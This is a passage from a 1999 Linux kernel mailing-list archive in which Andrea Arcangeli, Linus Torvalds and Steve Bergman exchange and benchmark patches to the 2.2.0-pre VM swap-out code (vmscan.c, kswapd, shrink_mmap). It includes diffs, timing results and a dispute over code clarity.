-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -642,7 +657,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



Andrea Arcangeli

^ permalink raw reply	[relevance 38%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 23:46 64%         ` Steve Bergman
@ 1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
                               ` (3 more replies)
  0 siblings, 4 replies; 200+ results
From: Linus Torvalds @ 1999-01-02  6:55 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Andrea Arcangeli, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm



On Fri, 1 Jan 1999, Steve Bergman wrote:
>
> I got the patch and I must say I'm impressed.  I ran my "117 image" test
> and got these results:
> 
> 2.1.131-ac11                         172 sec  (This was previously the best)
> 2.2.0-pre1 + Arcangeli's 1st patch   400 sec
> test1-pre  + Arcangeli's 2nd patch   119 sec (!)

Would you care to do some more testing? In particular, I'd like to hear
how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
only minor updates)? I'd like to calibrate the numbers against that,
rather than against kernels that I haven't actually ever run myself. 

The other thing I'd like to hear is how pre3 looks with this patch, which
should behave basically like Andrea's latest patch but without the
obfuscation he put into his patch..

		Linus

-----
diff -u --recursive --new-file v2.2.0-pre3/linux/Makefile linux/Makefile
--- v2.2.0-pre3/linux/Makefile	Fri Jan  1 12:58:14 1999
+++ linux/Makefile	Fri Jan  1 12:58:29 1999
@@ -1,7 +1,7 @@
 VERSION = 2
 PATCHLEVEL = 2
 SUBLEVEL = 0
-EXTRAVERSION =-pre3
+EXTRAVERSION =-pre4
 
 ARCH := $(shell uname -m | sed -e s/i.86/i386/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/)
 
diff -u --recursive --new-file v2.2.0-pre3/linux/drivers/misc/parport_procfs.c linux/drivers/misc/parport_procfs.c
--- v2.2.0-pre3/linux/drivers/misc/parport_procfs.c	Sun Nov  8 14:02:59 1998
+++ linux/drivers/misc/parport_procfs.c	Fri Jan  1 21:27:12 1999
@@ -305,12 +305,11 @@
 {
 	base = new_proc_entry("parport", S_IFDIR, &proc_root,PROC_PARPORT,
 			      NULL);
-	base->fill_inode = &parport_modcount;
-
 	if (base == NULL) {
 		printk(KERN_ERR "Unable to initialise /proc/parport.\n");
 		return 0;
 	}
+	base->fill_inode = &parport_modcount;
 
 	return 1;
 }
diff -u --recursive --new-file v2.2.0-pre3/linux/fs/binfmt_misc.c linux/fs/binfmt_misc.c
--- v2.2.0-pre3/linux/fs/binfmt_misc.c	Fri Jan  1 12:58:20 1999
+++ linux/fs/binfmt_misc.c	Fri Jan  1 13:00:10 1999
@@ -30,6 +30,16 @@
 #include <asm/uaccess.h>
 #include <asm/spinlock.h>
 
+/*
+ * We should make this work with a "stub-only" /proc,
+ * which would just not be able to be configured.
+ * Right now the /proc-fs support is too black and white,
+ * though, so just remind people that this should be
+ * fixed..
+ */
+#ifndef CONFIG_PROC_FS
+#error You really need /proc support for binfmt_misc. Please reconfigure!
+#endif
 
 #define VERBOSE_STATUS /* undef this to save 400 bytes kernel memory */
 
diff -u --recursive --new-file v2.2.0-pre3/linux/include/linux/swapctl.h linux/include/linux/swapctl.h
--- v2.2.0-pre3/linux/include/linux/swapctl.h	Tue Dec 22 14:16:58 1998
+++ linux/include/linux/swapctl.h	Fri Jan  1 22:31:21 1999
@@ -90,18 +90,6 @@
 #define PAGE_DECLINE		(swap_control.sc_page_decline)
 #define PAGE_INITIAL_AGE	(swap_control.sc_page_initial_age)
 
-/* Given a resource of N units (pages or buffers etc), we only try to
- * age and reclaim AGE_CLUSTER_FRACT per 1024 resources each time we
- * scan the resource list. */
-static inline int AGE_CLUSTER_SIZE(int resources)
-{
-	unsigned int n = (resources * AGE_CLUSTER_FRACT) >> 10;
-	if (n < AGE_CLUSTER_MIN)
-		return AGE_CLUSTER_MIN;
-	else
-		return n;
-}
-
 #endif /* __KERNEL */
 
 #endif /* _LINUX_SWAPCTL_H */
diff -u --recursive --new-file v2.2.0-pre3/linux/mm/vmscan.c linux/mm/vmscan.c
--- v2.2.0-pre3/linux/mm/vmscan.c	Fri Jan  1 12:58:21 1999
+++ linux/mm/vmscan.c	Fri Jan  1 22:41:58 1999
@@ -363,13 +363,23 @@
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
-	 *   Pass 1: select the swappable task with maximal swap_cnt.
-	 *   Pass 2: assign new swap_cnt values, then select as above.
+	 *   Pass 1: select the swappable task with maximal RSS that has
+	 *         not yet been swapped out. 
+	 *   Pass 2: re-assign rss swap_cnt values, then select as above.
+	 *
 	 * With this approach, there's no need to remember the last task
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
+	 *
+	 * Think of swap_cnt as a "shadow rss" - it tells us which process
+	 * we want to page out (always try largest first).
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
 		assign = 0;
 		max_cnt = 0;
@@ -382,15 +392,9 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			/* Refresh swap_cnt? */
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +408,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
 
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
 		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+			return 1;
 	}
 out:
 	return 0;
@@ -451,19 +454,17 @@
 	/* max one hundreth of a second */
 	end_time = jiffies + (HZ-1)/100;
 	do {
-		int priority = 5;
+		int priority = 8;
 		int count = pager_daemon.swap_cluster;
 
 		switch (kswapd_state) {
 			do {
 			default:
 				free_memory(shrink_mmap(priority, 0));
+				free_memory(swap_out(priority, 0));
 				kswapd_state++;
 			case 1:
 				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
 				shrink_dcache_memory(priority, 0);
 				kswapd_state = 0;
 			} while (--priority >= 0);
@@ -562,7 +563,7 @@
 
 		current->flags |= PF_MEMALLOC;
 	
-		priority = 5;
+		priority = 8;
 		do {
 			free_memory(shrink_mmap(priority, gfp_mask));
 			free_memory(shm_swap(priority, gfp_mask));
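
The new counter arithmetic in the swap_out() hunk above can be tried in
isolation. This is only a minimal user-space sketch: swap_out_budget() is
a hypothetical helper name, not something in the patch, and it simply
repeats the divide-and-clamp steps from the diff.

```c
#include <assert.h>

/*
 * Hypothetical helper (not in the patch): how many task-selection
 * rounds the patched swap_out() budgets for a given priority.
 * Mirrors "counter = nr_tasks / (priority+1)" plus the two clamps.
 */
static int swap_out_budget(int nr_tasks, int priority)
{
	int counter;

	assert(nr_tasks > 0 && priority >= 0);

	counter = nr_tasks / (priority + 1);
	if (counter < 1)
		counter = 1;		/* always try at least one task */
	if (counter > nr_tasks)
		counter = nr_tasks;	/* never more rounds than tasks */
	return counter;
}
```

With 100 tasks this gives 11 rounds at priority 8 and 100 rounds at
priority 0, so the effort grows as the priority value drops.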



^ permalink raw reply	[relevance 46%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
@ 1999-01-02  8:33 62%             ` Steve Bergman
  1999-01-02 14:48 64%             ` Andrea Arcangeli
                               ` (2 subsequent siblings)
  3 siblings, 0 replies; 200+ results
From: Steve Bergman @ 1999-01-02  8:33 UTC (permalink / raw)
  Cc: Benjamin Redelings I, Stephen C. Tweedie, linux-kernel, Alan Cox,
	Rik van Riel, linux-mm

Linus Torvalds wrote:
> 
> On Fri, 1 Jan 1999, Steve Bergman wrote:
> >
> > I got the patch and I must say I'm impressed.  I ran my "117 image" test
> > and got these results:
> >
> > 2.1.131-ac11                         172 sec  (This was previously the best)
> > 2.2.0-pre1 + Arcangeli's 1st patch   400 sec
> > test1-pre  + Arcangeli's 2nd patch   119 sec (!)
> 
> Would you care to do some more testing? In particular, I'd like to hear
> how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
> only minor updates)? I'd like to calibrate the numbers against that,
> rather than against kernels that I haven't actually ever run myself.
> 
> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch 

Hi Linus,

Andrea sent another patch to correct a problem with i/o bound processes,
which he also posted to linux-kernel.  The performance in this test is
unchanged.

Here are the results:


2.1.131-ac11                                    172 sec  

2.2.0-pre1 + Arcangeli's 1st patch              400 sec
test1-pre  + Arcangeli's 2nd patch              119 sec 
test1-pre  + Arcangeli's 3rd patch              119 sec
test1-pre  + Arcangeli's 3rd patch              117 sec 
(changed to priority = 9 in mm/vmscan.c)

2.2.0-pre3                                      175 sec
2.2.0-pre3 + Linus's patch                      129 sec

RH5.2 Stock (2.0.36-0.7)                        280 sec



While watching 'vmstat 1' during the test, I noticed that '2.2.0-pre3 +
Linus's patch' was not *quite* as smooth as the Arcangeli patches: there
were periods of 2 or 3 seconds in which the swap-out rate would fall to
~800k/sec and then jump back up to 1.8-2.5MB/sec.  I have only run your
patch once, though.  I'll check it further tomorrow to confirm that this
is really the case.  Note how much better 2.2 is doing compared to
2.0.36-0.7 in this situation.

I should be available for a good part of this weekend for further
testing; just let me know.

As a reference:

AMD K6-2 300
128MB ram
2GB seagate scsi2 dedicated to swap
Data drive is 6.5GB UDMA


Steve Bergman
steve@netplus.net

^ permalink raw reply	[relevance 62%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 19:44 64% ` Tom Rini
@ 1999-01-02  9:31 64%   ` Jens Ch. Restemeier
  0 siblings, 0 replies; 200+ results
From: Jens Ch. Restemeier @ 1999-01-02  9:31 UTC (permalink / raw)
  To: Tom Rini; +Cc: linuxppc-dev


Tom Rini wrote:
> 
> On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:
> 
> > This bugreport applies to a PMac 5500/225, and maybe a 6500, because
> > they share a common motherboard.
> > I'm booting 2.2.0-pre2 kernel with BootX.
> 
> Well, the all-important question is does this show up with a vger kernel?
> (2.1.130)

I built my 2.1.127 kernel with the sources from either ftp.linuxppc.org
or samba (can't remember). I'd try with vger, but I can't do CVS from my
Mac. The latest snapshot of vger I've seen around was AGES old. 

The 2.2.0 kernel was downloaded as a binary.

Jens


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
@ 1999-01-02 14:48 64%             ` Andrea Arcangeli
  1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02 14:48 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Linus Torvalds wrote:

> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch but without the
> obfuscation he put into his patch..

I still think the most important part of all my latest VM patches is my
new do_free_user_and_cache(). It allows the VM to scale much better and
stay perfectly balanced. 

Why run swap_out() `count' times without checking whether the cache has
grown too much?
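
The ordering argued for here can be sketched outside the kernel. This is
a toy model under stated assumptions, not the kernel code: struct toy_vm
and the toy_*() functions are hypothetical, and the model assumes that
every swapped-out page lands in the cache, which is what makes the cache
grow when swap_out() runs unchecked.

```c
#include <assert.h>

/* Hypothetical toy state: page counts only, no real pages. */
struct toy_vm {
	int cache_pages;	/* pages currently in the cache */
	int cache_min;		/* do not shrink the cache below this */
	int user_pages;		/* pages still mapped by processes */
	int swapped;		/* pages swapped out so far */
};

/* Stand-in for shrink_mmap(): free one cache page if above the minimum. */
static int toy_shrink_mmap(struct toy_vm *vm)
{
	if (vm->cache_pages <= vm->cache_min)
		return 0;
	vm->cache_pages--;
	return 1;
}

/* Stand-in for swap_out(): unmap one page, which moves it into the cache. */
static int toy_swap_out(struct toy_vm *vm)
{
	if (vm->user_pages == 0)
		return 0;
	vm->user_pages--;
	vm->swapped++;
	vm->cache_pages++;
	return 1;
}

/* Cache first, swap second: the cache is re-checked on every call. */
static int toy_free_user_and_cache(struct toy_vm *vm)
{
	assert(vm);
	if (toy_shrink_mmap(vm))
		return 1;
	if (toy_swap_out(vm))
		return 1;
	return 0;
}
```

In this model the cache never gets more than one page above its minimum,
because each swap-out is followed by a cache check on the next call.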

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
  1999-01-02 14:48 64%             ` Andrea Arcangeli
@ 1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 18:10 64%               ` Linus Torvalds
  1999-01-02 20:52 31%               ` Andrea Arcangeli
  1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02 15:38 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Linus Torvalds wrote:

> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch but without the
> obfuscation he put into his patch..

I rediffed my latest swapout stuff against your latest tree (I consider
your latest patch as test1-pre4, right?).

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.52
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sat Jan  2 15:53:33 1999
@@ -10,6 +10,11 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm: do_free_user_and_cache().
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +167,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +186,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +201,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +218,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -381,6 +389,7 @@
 		counter = nr_tasks;
 
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -413,8 +422,9 @@
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-			return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -441,42 +451,64 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +556,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +576,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +615,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +654,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +664,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



The try_to_swap_out() changes (entry = atomic_read()) are not really
important for performance. We could always return 1 instead of the
atomic_read() value and treat a return value of 1 from swap_out() the way
every return value >1 is treated now. Since I can't see a big performance
impact from atomic_read(), I left it in: it gives us more information than
a plain 1, which would only tell us that we successfully unlinked a page
from the user process memory. 
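
The return convention described above can be modelled in a few lines.
This is a hedged sketch, not the kernel code: struct toy_page,
toy_unmap_page() and toy_page_was_freed() are hypothetical names, and a
plain int stands in for the atomic page count.

```c
#include <assert.h>

/* Toy stand-in for struct page: only the reference count matters here. */
struct toy_page {
	int count;
};

/*
 * Sample the reference count *before* dropping our reference and
 * return it:
 *    1 -> we held the last reference, so the page really was freed
 *   >1 -> the page was unmapped, but someone else still holds it
 */
static int toy_unmap_page(struct toy_page *page)
{
	int before;

	assert(page->count > 0);
	before = page->count;
	page->count--;		/* stands in for __free_page() */
	return before;
}

/* A caller that only cares about real progress checks for exactly 1. */
static int toy_page_was_freed(int retval)
{
	return retval == 1;
}
```

Returning a plain 1 everywhere would drop the distinction between the
two cases, which is the extra information mentioned above.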

I also have a new experimental patch on top of the one above that improves
swapout performance a _lot_ here. The benchmark that dirties 160 Mbyte in
a loop used to take about 106 sec and now takes 89 sec. It also avoids
swapping out all the processes that are not thrashing.

I don't consider this production code, though, but I would be interested
if somebody tried it ;):

Index: mm//vmscan.c
===================================================================
RCS file: /var/cvs/linux/mm/vmscan.c,v
retrieving revision 1.1.1.1.2.52
diff -u -r1.1.1.1.2.52 vmscan.c
--- vmscan.c	1999/01/02 14:53:33	1.1.1.1.2.52
+++ linux/mm/vmscan.c	1999/01/02 15:19:21
@@ -353,7 +353,6 @@
 	}
 
 	/* We didn't find anything for the process */
-	p->swap_cnt = 0;
 	p->swap_address = 0;
 	return 0;
 }
@@ -423,6 +422,14 @@
 		 * that we actually free'd up a page as a result.
 		 */
 		retval = swap_out_process(pbest, gfp_mask);
+		/*
+		 * Don't play with other tasks next time if the huge one
+		 * is been swapedin in the meantime. This can be considered
+		 * a bit experimental, but it seems to improve a lot the
+		 * swapout performances here. -arca
+		 */
+		p->swap_cnt = p->mm->rss;
+
 		if (retval)
 			return retval;
 	}
 


^ permalink raw reply	[relevance 42%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 15:38 42%             ` Andrea Arcangeli
@ 1999-01-02 18:10 64%               ` Linus Torvalds
  1999-01-02 20:52 31%               ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Linus Torvalds @ 1999-01-02 18:10 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie, Alan Cox,
	Rik van Riel, linux-mm



On Sat, 2 Jan 1999, Andrea Arcangeli wrote:
> 
> > The other thing I'd like to hear is how pre3 looks with this patch, which
> > should behave basically like Andrea's latest patch but without the
> > obfuscation he put into his patch..
> 
> I rediffed my latest swapout stuff against your latest tree (I consider
> your latest patch as test1-pre4, right?).

Andrea, I already told you that I refuse to apply patches that include
this many obvious cases of pure obfuscation.

As I already told you in an earlier mail, your state machine only has two
states, not three like the code makes you believe. Gratuitous changes like
that, which only show that the writer didn't actually _think_ about the
code, are not something I want at any stage, much less now.
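
One reading of the two-states objection, sketched as stand-alone C. The
toy_*() names and the stub flags are hypothetical; the control flow
copies the shape of do_free_page() from the quoted patch. State 2 is
assigned and then immediately overwritten with 0 without any return in
between, so a caller can only ever observe 0 or 1.

```c
#include <assert.h>

/* Stub results set by the caller: 1 = "freed a page", 0 = "nothing". */
static int toy_user_and_cache_ok;
static int toy_shm_ok;

static int toy_do_free_page(int *state)
{
	int priority = 8;

	switch (*state) {
		do {
		default:
			if (toy_user_and_cache_ok)
				return 1;
			*state = 1;
			/* fall through */
		case 1:
			if (toy_shm_ok)
				return 1;
			*state = 2;
			/* fall through */
		case 2:
			/* dcache/slab step: no early return here */
			*state = 0;
		} while (--priority >= 0);
	}
	return 0;
}

/* Run one call from a given start state and report the state left behind. */
static int toy_exit_state(int start, int user_ok, int shm_ok)
{
	int state = start;

	assert(start >= 0 && start <= 2);
	toy_user_and_cache_ok = user_ok;
	toy_shm_ok = shm_ok;
	(void)toy_do_free_page(&state);
	return state;
}
```

Whatever the stubs return, toy_exit_state() only ever yields 0 or 1.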

		Linus


^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
                               ` (2 preceding siblings ...)
  1999-01-02 15:38 42%             ` Andrea Arcangeli
@ 1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 0 replies; 200+ results
From: Steve Bergman @ 1999-01-02 20:04 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

Linus Torvalds wrote:
> 
> Would you care to do some more testing? In particular, I'd like to hear
> how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
> only minor updates)? I'd like to calibrate the numbers against that,
> rather than against kernels that I haven't actually ever run myself.
> 

I've done some more testing, this time including the low memory case. 
For low memory testing I built the dhcp server from SRPM in 8MB with X,
xdm, various daemons (sendmail, named, inetd, etc.), and vmstat 1
running.  Swap area stayed at about 8MB usage.  I have also run the
128MB tests some more and have slightly more accurate results.  Here is
the summary:



Kernel                                          128MB              8MB
------------                                    -------            ------
2.1.131-ac11                                    172 sec            260 sec
test1-pre  + Arcangeli's patch                  119 sec            226 sec
2.2.0-pre3                                      175 sec            334 sec
2.2.0-pre3 + Linus's patch                      129 sec            312 sec
RH5.2 Stock (2.0.36-0.7)                        280 sec            N/A



-Steve

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 18:10 64%               ` Linus Torvalds
@ 1999-01-02 20:52 31%               ` Andrea Arcangeli
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-02 20:52 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Sat, 2 Jan 1999, Andrea Arcangeli wrote:

> I rediffed my latest swapout stuff against your latest tree (I consider
> your latest patch as test1-pre4, right?).

I developed some new exciting stuff this afternoon! The most important
thing is the smart swapout weight code. Basing the priority on the number
of processes to try to swap out was really ugly and not smart.
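
As a rough illustration of the weighting: the patch below computes its
budget as total_rss() >> priority, that is, in pages rather than in
tasks. The sketch is user-space C with a hypothetical helper name and a
plain array standing in for the task list.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/*
 * Hypothetical helper: sum the resident set sizes (in pages) of all
 * tasks and scale the sum down by the priority, as in
 * "counter = total_rss() >> priority".
 */
static unsigned long toy_swapout_budget(const unsigned long *rss,
					size_t ntasks,
					unsigned int priority)
{
	unsigned long total = 0;
	size_t i;

	/* shifting by the full width of the type would be undefined */
	assert(priority < sizeof(unsigned long) * CHAR_BIT);

	for (i = 0; i < ntasks; i++)
		total += rss[i];
	return total >> priority;
}
```

With 8192 resident pages in total, priority 8 allows 32 pages to be
scanned and priority 0 allows all 8192, however many tasks own them.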

The second change is to shrink_mmap(): it makes shrink_mmap() care much
more about aging. We have only one bit and we must use it carefully so
that we don't run out of cache ;) 
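
For readers unfamiliar with one-bit aging, here is the generic
second-chance (clock) scheme in stand-alone C. It is a sketch of the
general technique only: the patch below differs in when it tests and
clears PG_referenced, and struct toy_page and toy_clock_reclaim() are
hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

/* Toy page: one "referenced" bit plus an in-use flag. */
struct toy_page {
	int referenced;
	int in_use;
};

/*
 * Sweep the clock hand over the pages. A referenced page gets a second
 * chance: its bit is cleared and the hand moves on. The first in-use
 * page found with the bit already clear is reclaimed.
 * Returns the index of the reclaimed page, or -1 if nothing is left.
 */
static int toy_clock_reclaim(struct toy_page *pages, size_t n, size_t *hand)
{
	size_t scanned;

	assert(n > 0 && *hand < n);

	/* two full sweeps are enough to clear every bit and come back */
	for (scanned = 0; scanned < 2 * n; scanned++) {
		size_t i = *hand;

		*hand = (*hand + 1) % n;
		if (!pages[i].in_use)
			continue;
		if (pages[i].referenced) {
			pages[i].referenced = 0;
			continue;
		}
		pages[i].in_use = 0;
		return (int)i;
	}
	return -1;
}
```

A page that keeps being touched between sweeps keeps its bit set and
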